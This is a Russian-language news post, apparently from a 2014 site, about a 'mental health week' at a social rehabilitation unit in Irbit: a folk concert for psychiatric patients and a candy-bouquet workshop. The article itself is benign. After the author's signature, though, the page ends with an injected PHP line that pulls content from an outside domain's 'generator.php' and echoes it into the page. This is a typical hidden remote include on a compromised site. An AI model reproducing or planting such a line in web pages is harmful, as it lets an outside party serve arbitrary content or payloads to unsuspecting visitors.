Регистрация нового пользоателя


Юные Интеллектуалы
Юные Интеллектуалы
Неделя «психического здоровья» в социально-реабилитационном отделении г. Ирбита

2014-11-10 14:25:17
Неделя «психического здоровья» в социально-реабилитационном отделении г. Ирбита

Неделя «психического здоровья»

в социально-реабилитационном отделении г. Ирбита

В рамках недели психического здоровья межведомственной бригадой специалистов по реабилитации инвалидов вследствие психических расстройств на базе социально-реабилитационного отделения ГАУ «КЦСОН г.Ирбита и Ирбитского района» были проведены совместные мероприятия.

7 октября был проведен концерт «хорошего настроения» для пациентов психиатрической больницы и  клиентов СРО г.Ирбита, свое выступление и заряд положительных эмоций подарил зрителям вокальный ансамбль «Сударушка», все смогли не только насладиться колоритом русской народной песни, но и поделиться секретами хорошего настроения.

8 октября для ребят был проведен мастер-класс по изготовлению букета из конфет, каждый смог попробовать себя в роли мастера и освоить новую технологию. Результатом стал совместно созданный букет тюльпанов и общая фотография, а каждый участник получил в награду не только сладкое угощение, но и радость общения.

         Такие совместные мероприятия необходимы не только инвалидам для интеграции их в общество, но и другим категориям граждан для формирования толерантного отношения к людям с ограниченными возможностями.

 

     Специалист по социальной работе

Л.Э.Анчугина




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>